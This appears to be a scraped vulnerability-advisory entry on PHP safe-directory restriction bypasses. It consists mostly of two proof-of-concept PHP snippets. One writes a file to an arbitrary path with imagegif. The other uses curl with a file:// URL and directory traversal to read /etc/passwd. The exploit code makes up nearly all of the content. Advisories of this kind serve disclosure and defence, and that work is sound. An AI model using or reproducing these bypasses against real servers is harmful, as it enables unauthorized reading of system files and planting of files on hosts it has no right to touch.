|
PHP Safedir Restriction Bypass Vulnerabilities
No exploit is required. The following proof of concepts are available: <?php $im = imagecreatefromgif("file.gif"); imagegif($im, '/var/www/f34r.fr/c/f/elbossoso/.i.need.money.php'); ?> <?php mkdir("./".$_SERVER["SCRIPT_NAME"]."?"); $ch = curl_init("file://".$_SERVER["SCRIPT_FILENAME"]."?/../../../../../../../../../../../etc/passwd "); $file=curl_exec($ch); echo $file; ?> |
|
|
Privacy Statement |